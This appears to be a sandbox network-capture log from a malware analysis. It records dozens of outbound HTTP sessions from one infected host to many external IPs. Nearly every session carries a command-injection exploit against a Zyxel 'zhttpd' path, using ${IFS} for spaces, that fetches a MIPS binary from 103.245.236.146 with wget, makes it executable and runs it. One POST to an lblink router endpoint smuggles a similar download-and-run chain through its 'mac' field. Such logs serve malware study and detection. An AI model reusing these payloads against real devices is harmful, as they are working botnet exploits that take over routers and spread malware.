                                                Jan 28, 2024 10:16:37.999875069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7811192.168.2.2333100183.185.184.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999922037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7812192.168.2.2339724213.47.158.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999942064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7813192.168.2.2351578184.132.85.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999979019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7814192.168.2.234822264.203.173.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000008106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7815192.168.2.234132259.223.126.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000025988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7816192.168.2.2337348107.59.79.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000055075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7817192.168.2.2351978189.125.199.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000076056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7818192.168.2.2344410106.176.192.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000121117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7819192.168.2.2347604124.50.92.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000123024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7820192.168.2.2333578163.62.10.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000163078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7821192.168.2.2349788121.59.15.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000185966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7822192.168.2.234641093.227.140.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000232935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7823192.168.2.234233454.19.46.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000266075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7824192.168.2.2334576128.81.88.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000293016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7825192.168.2.235147682.159.1.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000319004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7826192.168.2.2358996151.123.203.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000329971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7827192.168.2.234494074.29.137.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000386953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7828192.168.2.23551105.116.77.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000386953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7829192.168.2.233517051.15.5.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000433922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7830192.168.2.2358314207.109.116.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000457048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7831192.168.2.235859295.144.79.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000468016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7832192.168.2.2339066209.119.77.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000474930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7833192.168.2.2332936163.96.135.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000550032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7834192.168.2.2353046137.79.214.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000557899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7835192.168.2.2339634177.80.160.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000582933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7836192.168.2.233887438.12.225.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000612974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7837192.168.2.2354002203.20.226.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000659943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7838192.168.2.234653619.204.143.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.000689983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7839192.168.2.2360570213.24.70.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003576994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7840192.168.2.235904034.170.234.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003607035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7841192.168.2.234739043.9.180.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003618002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7842192.168.2.2334942132.179.207.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003652096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7843192.168.2.2335162155.124.161.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003684044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7844192.168.2.2352464119.246.24.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003690004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7845192.168.2.2337554194.185.90.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003720999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7846192.168.2.2337446156.184.189.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003762960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7847192.168.2.2360298212.29.195.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003789902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7848192.168.2.2338720133.202.76.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003812075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7849192.168.2.234621627.159.253.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003822088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7850192.168.2.233598035.1.108.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003882885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7851192.168.2.236015225.38.3.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.003914118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7852192.168.2.233454027.50.1.1658080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:38.118726969 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7853192.168.2.2343972124.34.35.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.016916037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7854192.168.2.2334468194.246.3.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017117023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7855192.168.2.2355768197.105.193.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017124891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7856192.168.2.233864025.92.24.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017157078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7857192.168.2.2339678188.112.165.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017158031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7858192.168.2.2352696105.60.98.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017178059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7859192.168.2.234083049.12.12.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017184019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7860192.168.2.235218496.53.250.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017201900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7861192.168.2.2336650177.212.58.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017213106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7862192.168.2.23367744.16.159.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017247915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7863192.168.2.2335632153.253.230.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017297983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7864192.168.2.2336302199.18.192.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017328024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7865192.168.2.2338098208.167.105.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017360926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7866192.168.2.233826288.154.164.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017371893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7867192.168.2.2336846195.73.47.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017391920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7868192.168.2.234582476.35.121.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017425060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7869192.168.2.235933486.115.78.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017461061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7870192.168.2.2359002173.88.194.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017477989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


